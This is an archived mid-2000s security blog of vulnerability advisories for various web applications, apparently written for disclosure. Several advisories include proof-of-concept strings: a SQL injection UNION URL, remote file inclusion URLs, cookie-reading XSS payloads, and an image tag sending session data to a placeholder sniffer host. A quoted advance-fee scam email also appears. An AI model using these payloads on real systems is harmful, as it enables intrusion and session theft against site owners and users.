- UNSECURED SYSTEMS -

UNSECURED SYSTEMS vol.2 blog

2007-05-17T12:03:00.000+02:00

we have new blog pridels-team.blogspot.com
this blog will run only as archive, in new will be published fresh advisories and news from us.

DVDdb XSS vuln.

2007-05-02T18:17:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://globalmegacorp.org/dvddb/
affected versions: 0.6 and previous
###############################################

DVDdb contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "movieid" parameter in "loan.php" and "s" parameter in "listmovies.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

PHPChain vuln.

2007-05-02T18:10:00.000+02:00

PHPChain vuln.
###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://www.globalmegacorp.org/PHPChain/
affected versions: 1.0 and previous
###############################################

PHPChain contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "catid" parameter in "settings.php" and in "cat.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Also there is full path disclosure , "attacker" will get full installisations path by testing XSS examples in vuln. parameters.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

FileRun Vuln.

2007-05-02T04:24:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 2 May 2007
vendor:http://filerun.dreamhosters.com/
affected versions: 1.0 and previous
###############################################

1.
FileRun contains a flaw that allows a remote sql injection attacks.Input passed to the "fid" parameter isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
FileRun contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page","module","section" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################

AlstraSoft Video Share Enterprise - Information disclosure & SQL injection vuln

2007-03-29T13:32:00.000+02:00

============================
discovered by : VietMafia
developer's site: www.alstrasoft.com
script: AlstraSoft Video Share Enterprise
risk: medium
status: unpatched
============================

This script has a vuln which can be exploited by malicious people to disclose sensitive information & access to system as administrator.

1.The file siteadmin/useredit.php can be accessed without any authetication. User's info can be viewed & edited after that.

example:

http://host/path/siteadmin/useredit.php?uid=userid

2.SQL injection

after we got access as a registered user there's a sql inj vuln in msg.php file

poc : http://host/path/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1

thanks DH for helping me verify this. :)

===============================

come back

2007-03-27T10:34:00.000+02:00

Der4444,

check ur email krustevs at gmail. I dont see you on icq.

Vietmafia

Crash.

2007-02-21T19:34:00.000+01:00

Hello guys!
No new entries for long time , board is down more than half year.
Everthing looks dead, so it was also.
Lets say somebody from us had alot of jobs behind this scene other ones take some hollydays.
But now i think we can continue wht we had started.
I still miss contacts to Vietmafia and cembo,but guys if you read this post let me know if we can count of you in team.
Just mail me krustevs at gmail
or via icq 476010452

A Book A Day

2006-08-29T20:30:00.000+02:00

From this day forward you will be able to find a new e-book about programming, every day. They are posted at our forums. E-books about other topics coming soon as well.

PhpHostBot remote File Inclusion Vuln.

2006-07-20T05:06:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpHostBot.php
affected versions:PhpHostBot 1.0 / AutoHost 3.0
###############################################

Vulnerability Description:

PhpHostBot contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "order/index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/order/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PhpLinkExchange remote File Inclusion Vuln.

2006-07-20T05:03:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 20 july 2006
vendor:www.idevspot.com/PhpLinkExchange.php
affected versions: 1.0 and prior
###############################################

Vulnerability Description:

PhpLinkExchange contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.
User input passed to the "page" parameter in "index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.

example:

http://[victim]/index.php?page=http://[malicious_site]/file

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

HiveMail vuln.

2006-07-11T14:56:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 11 july 2006
vendor:http://hivemail.com/
affected versions:
tested on 1.3 and 1.2 versions
other versions also can be affected.
###############################################

Vuln. Description:

1.
HiveMail contains a flaw that allows a remote sql injection attacks.Input passed to the "fields[]" parameter in "search.results.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
HiveMail contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "email","cond","name" parameters in "addressbook.view.php" and input passed to the "daysprune" parameter in "index.php" and input passed to the "data[to]" parameter in "compose.email.php" and input passed to the "markas" parameter in "read.markas.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

3.
It is also possible to disclose the full path to "search.results.php" by defining "searchdate" and "folderids" parameters.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Scamming

2006-07-01T14:44:00.000+02:00

Title:Please, I need to hear from you now

From:Dr. James Ransome
at:30. Juni 2006 09:06

Barclays Bank Plc
London, United Kingdom
I am Dr. James Ransome , Senior Credit Officer, Barclays Bank Plc London. I am writing following an opportunity in my office that will be of immense benefit to both of us.
In my department we discovered an abandoned sum of £12.5million British Pounds Sterling (Twelve Million Five Hundred Thousand British Pounds Sterling) in an account that belongs to one of our foreign customers Late Mr. Morris Thompson an American who unfortunately lost his life in the plane crash of Alaska Airlines
Flight 261, which crashed on January 31 2000, including his wife and only daughter. You shall read more about the crash on visiting this website.

Since we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because the Bank cannot release the funds unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.
Unfortunately I learnt that his supposed next of kin being his only daughter died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. It is therefore upon this discovery that I and two other officials in this department now decided to do business with you and release the money to you as the next of kin or beneficiary of the funds for safe keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill.
We agreed that 20% of this money would be for you as foreign partner, while the balance will be for my colleagues and I. We will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. Please be honest to me as trust is our watchword in this transaction.
Note that this transaction is confidential and risk free. As soon as you receive this mail you should contact me by return mail whether or not you are willing to enter into this deal. In the event you are not interested, I sincerely ask that you disregard this email and tell no one about it. I am very careful on truncating my banking career should you mention this to someone else. I hope you can be trusted in this regard.
Please note that all necessary arrangement for the smooth release of these funds to you has been finalized. We will discuss much in details when I do receive your response.
Please in your response include your telephone and fax numbers for a better communication between us.
You can reach me on the email below
Best regards
James Ransome
Email: jamesransome20067@zonai.com

He he, first at all If some person will say that he works for some company, thats means thathe also will use that company´s email and not from "zonai.com"
But thats also not a point ,with emails there is alot of tricks how to survive .

Next point is how like in this example Brclays bank manager have my email?
Let me answer , my email you will become with spammers software like Mail grabber.

OK. that we everybody now, that money is stollen not from dead American person , but for normal live costumers from some ecommerce site on net or using some poor IE exploits to get they trojan on victims maschine.

For me is intrestnig, that point... if you will say that you had belived to those gangsters and they used your bank account for they illegal money transfers, than you are not guilty.

But lets say, that you belived to those gangsters , but you was to greedy to be happy with they offered 20% and you taked all money.

In both ways you will get in contact with your country law instances.

And guess wich way is better ?

Third one?

Multiple Browsers Information Disclosure vuln.

2006-06-27T21:20:00.000+02:00

Multiple Browsers Information Disclosure vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
###############################################

Vuln. Description:

Multiple Browsers contains a flaw which can be exploited by malicious people to disclose potentially sensitive information.
An error in the handling of redirections can be exploited to access documents served from another web site via the "object.documentElement.outerHTML" property.

Affected browsers:

MYweb4net Browser 3.8.8.0
http://www.mybrowser.web4net.net/

GreenBrowser 3.4.0622
http://www.morequick.com/

Maxthon v1.5.6 build 42
http://www.maxthon.com/

PhaseOut 5.4.4
http://www.phaseout.net/

FineBrowser Freeware version v3.2.2
http://www.finebrowser.com/

Slim Browser 4.07 build 100
http://www.flashpeak.com/

NetCaptor 4.5.7 Personal Edition
http://www.netcaptor.com/

Enigma Browser 3.8.8
http://www.suttondesigns.com/

Fast Browser Pro 8.1
http://fastbrowser.net/

GoSuRF Browser 2.62
http://gosurfbrowser.com/?ln=en

Previous versions off those browsers also can be affected.

Tested on Windows XP/SP2 and IE 6 ( some of those browsers use IE engine to run, but offcourse not vuln. IE 6.0 was used for that tests.)

note: This advisory is based on Plebo Aesdi Nael advisory in IE.

Reff url: http://secunia.com/advisories/20825/

###############################################
Solution:
Disable Active Scripting support.
###############################################
More information @ unsecured-systems.com/forum/

Hostflow vuln.

2006-06-27T15:49:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.hostflow.com/
affected versions:2.2.1-15 and previous
###############################################

Vuln. Description:

Hostflow contains a flaw which could allow a remote attacker to hijack user sessions. A remote attacker can retrieve the authentication information to hijack a user session if a user includes a URL link within a helpdesk message because in default there isn't IP address verification. This would allow the attacker to take control victims control panel.

example:

1.
post:
(img src="http://[sniffer-host]/r0t.gif" width="0" height="0")
note: change "(" to "<" and ")" to ">"

2. or it also will works with simple refferal url function.
For manual testing use html code and create hyperlink to resource wich will show you refferal url´s in example some hit counter or statistic apllication do it well.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

HSPcomplete vuln.

2006-06-27T06:31:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.swsoft.com/en/products/hspcomplete/
affected versions:3.2.2 , 3.3 Beta and prior
###############################################

Vuln. Description:

HSPcomplete contains a flaw that allows a remote sql injection attacks.Input passed to the "type" parameter in "report.php" and input passed to the "level" parameter in "custom_buttons.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

H-Sphere <=2.5.x XSS vuln.

2006-06-27T05:34:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 27 june 2006
vendor:http://www.psoft.net/h_sphere2_info.html
affected versions:2.5.1 Beta 1 (2.5.1.801.20060621)
and previous
###############################################

Vuln. Description:

H-Sphere contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "next_template","start","curr_menu_id","arid" parameters isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_
menu_id=&start=&next_template=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_men
u_id=&start=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.CP
?template_name=mailman/massmail.html&arid=46&curr_me
nu_id=[XSS]

http://[host]/psoft/servlet/resadmin/psoft.hsphere.C
P?template_name=mailman/massmail.html&arid=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Zorum Forum <=3.5 vuln.

2006-06-26T21:01:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 26 june 2006
vendor:http://zorum.phpoutsourcing.com/
affected versions:3.5 and prior
###############################################

Vuln. Description:

1.
Zorum Forum contains a flaw that allows a remote sql injection attacks.Input passed to the "offset","tid","fromid","sortby","fromfrommethod","fromfromlist" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
Zorum Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "frommethod","list","method" parameter in "index.php" and most parameters from SQL injection vuln. isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Additional info:
Some of those parameters by both vulnerabilities will give Full Path Disclosure and there will be many other parameters wich isnt properly sanitised.
And if it will be not enough you can aslo figure out something like sql injection form search engine module, just try to add in any possible field some "unsanitised" input and you will see.

ref:
Zorum Arbitrary Command Execution and SQL Injection Vulnerabilities
Zorum forum 3.5 sql injection exploit

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Хакер (Андрей Житков)

2006-06-26T14:38:00.000+02:00

Он – хакер. Гений и хулиган. Его цель – взломать банковскую сеть и стать миллионером. Для него это не более чем компьютерная игра. Но вскоре он сам становится персонажем чьей-то совсем не виртуальной игры, а его друзья и знакомые погибают от настоящего, а не виртуального оружия…

Download

DeluxeBB <=1.07 XSS vuln.

2006-06-25T18:58:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.deluxebb.com/
affected versions:1.07 and prior
###############################################

Vuln. Description:

DeluxeBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subject" and "to" parameter in "pm.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ICT - Infinite Core Technologies vuln.

2006-06-25T18:35:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.infinitecore.com/
affected versions:1.0 Gold and prior
###############################################

Vuln. Description:

ICT contains a flaw that allows a remote sql injection attacks.Input passed to the "post" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

OpenForum XSS vuln.

2006-06-25T17:45:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:www.2enetworx.com/dev/projects/openforum.asp
affected versions:1.2 Beta and prior
###############################################

Vuln. Description:

OpenForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ofdisp" and "ofmsgid" parameter in "openforum.asp" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

GL-SH Deaf Forum XSS vuln.

2006-06-25T03:38:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://www.frank-karau.de/
affected versions:6.4.3 and prior
###############################################

Vuln. Description:

GL-SH Deaf Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "sort" parameter in "show.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpQLAdmin vuln.

2006-06-25T00:57:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 25 june 2006
vendor:http://phpqladmin.com
affected versions:2.2.x and previous
###############################################

Vuln. Description:

phpQLAdmin contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "domain" parameter in "user_add.php" and "unit_add.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

XennoBB XSS vuln.

2006-06-24T20:40:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.xennobb.com/
affected versions:1.0.5 and prior
###############################################

Vuln. Description:

XennoBB contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "tid" parameter in "messages.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

btw ...

2006-06-24T14:23:00.000+02:00

Somebody was asked to me why coments on this blog is "censured" - moderated.
Every day tehere are almost 50 spammers with comercial spam, like credit loans and other shit...im not suprissed cauz many of my reports/advisories are ecommerce webaplications.
To fight with spammers ..hm... if it was one ..it will be not so dificult , but ...
Any way spam sucks...

In my last post i told that i will not have time to publish advisories and report about unsecured systems and i told that i will post 10-15 and thats will be end and other guys or VietMafia will continue contribute blog with advisories.
IN place of 10-15 is more than 50 became , cauz VietMafia didnt .... So for me its to easy to do nothin, thats why i didnt stop..even my time is limited . I will continue so long as i can.

And again there is some developers (2 from 50) who are shocked that i didnt contacted them and reported about vuln.
I regullary try to do this in every 100 advisory i try, so no succesfull result till now, so why i must?
So i think that we stay in one point, i can do only my job wih success if you do mistakes, if you dont i can do my job.
Everyone have mistakes and im not better than you , its just my job to find out some mistakes.
In that point i wanna also say thanks to Secunia and OSVDB guys for support.

And till now i didnt wrote article about wich i had promissed to write,cauz im waiting when cembo will complete PVS-Pridels Vuln Scanner , if its will be great tool my meaning can change and content of article to, thats why i better wait.
And before it will be published i will try as alternative for my fingers... :)

mvnForum XSS vuln.

2006-06-24T04:29:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.mvnforum.com/
affected versions:1.0 GA and prior
###############################################

Vuln. Description:

mvnForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "member" and "activatecode" parameters in activatemember isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

examples:
mvnForum/activatemember?activatecode=&mem
ber=%22%3Cscript%3Ealert('r0t')%3C/script%3E

mvnForum/activatemember?activatecode=%22%3Cscri
pt%3Ealert(document.cookie)%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

UebiMiau Webmail XSS vuln.

2006-06-24T03:06:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://www.uebimiau.org/
affected versions:2.7.10 ,2.7.2 and prior
###############################################

Vuln. Description:

UebiMiau Webmail contains multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "f_user" parameter in "index.php" and input passed to the "pag" parameter in "messages.php" and input passed to the "lid","tid","sid" parameter in "error.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Anthill SQL injection vuln.

2006-06-24T00:59:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 24 june 2006
vendor:http://anthill.vmlinuz.ca/
affected versions:0.2.6 and 0.3.0 and prior
###############################################

Vuln. Description:

Anthill contains a flaw that allows a remote sql injection attacks.Input passed to the "order" parameter in "buglist.php" and input passed to the "bug" parameter in "query.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

note:
Successful exploitation of the query.php script requires that "magic_quotes_gpc" is disabled.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BNBT TrinEdit vuln.

2006-06-22T15:27:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 22 june 2006
vendor:http://bnbteasytracker.sourceforge.net/
affected versions:7.7r3.2004.10.27 and prior
###############################################

Vuln. Description:

BNBT TrinEdit contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "filter" and "sort" parameter in "index.html" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

note:
Its possible that BNBT EasyTracker 7.7r3.2004.10.27 have same problem.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Azureus <=2.4.0.2 XSS vuln.

2006-06-21T21:04:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://azureus.sourceforge.net/
affected versions:Azureus 2.4.0.2
Azureus Tracker version 2.4.0.2/2.0
and previos versions
###############################################

Vuln. Description:

Azureus : Java BitTorrent Client Tracker contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "search" parameter in "index.tmpl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

example:
http://host:6969/index.tmpl?search=%22%3Cscript%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Enterprise Groupware System XSS vuln.

2006-06-21T18:04:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.enterprisegroupwaresystem.org/
affected versions:1.2.4 and prior
###############################################

Vuln. Description:

EGS contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "module" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

dev Vs def

2006-06-21T14:56:00.000+02:00

While surfing i found one article from one developer (Jörg Stöber) ,a developer of Content*Builder.
His wroten article title is - Defacing?!!
He says that now he knows what means defacing.
I suppose that he started recognize that stuff after Kacper had discovered multiple remote file include vuln. in Content*Builder.
Whats happends later , you know if you will look at views count only in milw0rm.
Also as Jörg says that there was many deface attemps to sites wich use they software.
Till that i understood his message cleary, but when he start to explain and teach about that stufff wich he knows some days only...And say that "script kidies" are use almost Opensource to find variables where including remote files arent properly santized.
In that point Jörg,i dont like also defacers ... but almost software auditors dont have nothing together with defacers like " Hack3d by TurKish HacKerS t34m!!!", only thing is that most of webbaplication auditors/pentesters work is used to attack vuln. software using websites.
And for a "Script Kidie" is easiest way to deface is using published POC , where he must only change from http://victim-host.com/vuln_file.php?include_path= to your host name.
And i like developers like you ... who are dumb enough to code unsecure and in that time also clever to teach/speak about security and give to people stattus wich kind of them can be used by yourself.
If you was lame to code , than why you must now speak in that way,try to look at you source better and not speak as coder god, cauz its still have more mistakes as mine english.

Knowlegde is power.

Ultimate eShop XSS vuln.

2006-06-21T04:11:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.ultimate-eshop.de/
affected versions:1.00 and prior
###############################################

Vuln. Description:

Ultimate eShop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "subid" parameter in "index.cgi" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

phpTRADER Multiple SQL injection vuln.

2006-06-21T04:10:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:
www.bluehouse-project.de/index.php?area=1&p=product
affected versions:4.9 SP 5 and prior
###############################################

Vuln. Description:

phpTRADER contains a flaw that allows a remote sql injection attacks.Input passed to the "sectio" parameter in "login.php","write_newad.php","newad.php",
"printad.php","askseller.php","browse.php",
"showmemberads.php","note_ad.php","abuse.php",
"buynow.php","confirm_newad.php" and input passed to the "an" parameter in "printad.php","note_ad.php" and input passed to the "who" parameter in "showmemberads.php" and input passed to the "adnr" parameter in "buynow.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

UltimateGoogle XSS vuln.

2006-06-21T04:09:00.001+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/google/
affected versions:1.00 and prior
###############################################

Vuln. Description:

UltimateGoogle contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "REQ" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

thinkWMS SQL injection vuln.

2006-06-21T04:09:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/thinkWMS/
affected versions:1.0 and prior
###############################################

Vuln. Description:

thinkWMS contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.php","printarticle.php" and input passed to the "catid" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Ultimate Estate vuln.

2006-06-21T04:08:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:www.thinkfactory.de/produkte/ultimate-estate/
affected versions:1.0 and prior
###############################################

Vuln. Description:

1.
Ultimate Estate contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "index.pl" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2.
Ultimate Estate contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "cat" parameter in "index.pl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Ultimate Auction XSS vuln.

2006-06-21T04:07:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.ultimate-auction.de/
affected versions:1.0 and prior
###############################################

Vuln. Description:

Ultimate Auction contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "item" parameter in "emailtofriend.pl","violation.pl" and input passed to the "seller" parameter in "vsoa.pl" and input passed to the "user" parameter in "userask.pl","leavefeed.pl" and input passed to the "itemnum" parameter in "userask.pl" and input passed to the "category" parameter in "itemlist.pl" and input passed to the "query" parameter in "search.pl" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

FineShop vuln.

2006-06-21T04:06:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://fineshop.pl/
affected versions:3.0 and prior
###############################################

Vuln. Description:

1.
FineShop contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "promocja","wysw","id_produc" parameter in "index.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

2.
FineShop contains a flaw that allows a remote sql injection attacks.Input passed to the "produkt","id_produc","id_kat" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

IMGallery vuln.

2006-06-21T04:05:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 21 june 2006
vendor:http://www.imgallery.zor.pl/
affected versions:2.4 and prior
###############################################

Vuln. Description:

IMGallery contains a flaw that allows a remote sql injection attacks.Input passed to the "start","sort" parameter in "galeria.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Atlassian JIRA™ Information Disclosure

2006-06-20T15:17:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.atlassian.com/software/jira/
affected versions:
Enterprise Edition, Version: 3.6.2-#156
other versions also can be affected
###############################################

Vuln. Description:

Input passed via the URL when accessing "secure/ConfigureReleaseNote.jspa" directly isn't properly sanitised before being returned to the user in an error response. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Atlassian JIRA™ contains a flaw that allows malicious people to gain knowledge of various system information.Input passed to the "projectId" parameter in "secure/ConfigureReleaseNote.jspa" isn't properly sanitised before being returned to the user.
With error message/report remote attacker will get various system information in example to get full install path, used software,general system configuration.

###############################################
Solution:
Restrict access to the "secure/ConfigureReleaseNote.jspa" script in a proxy server or firewall with URL filtering capabilities. This may affect functionality.

###############################################
More information @ unsecured-systems.com/forum/

phpMyForum <=4.1.3 XSS vuln.

2006-06-20T12:45:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.phpmyforum.de/
affected versions:4.1.3 and prior
###############################################

Vuln. Description:

phpMyForum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "highlight" parameter in "topic.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

CavoxCms SQL injection vuln.

2006-06-20T04:10:00.000+02:00

###############################################
Vuln. discovered by : r0t
Date: 20 june 2006
vendor:http://www.cavoxcms.ch/
affected versions:v1.0.16 and prior
###############################################

Vuln. Description:

CavoxCms contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
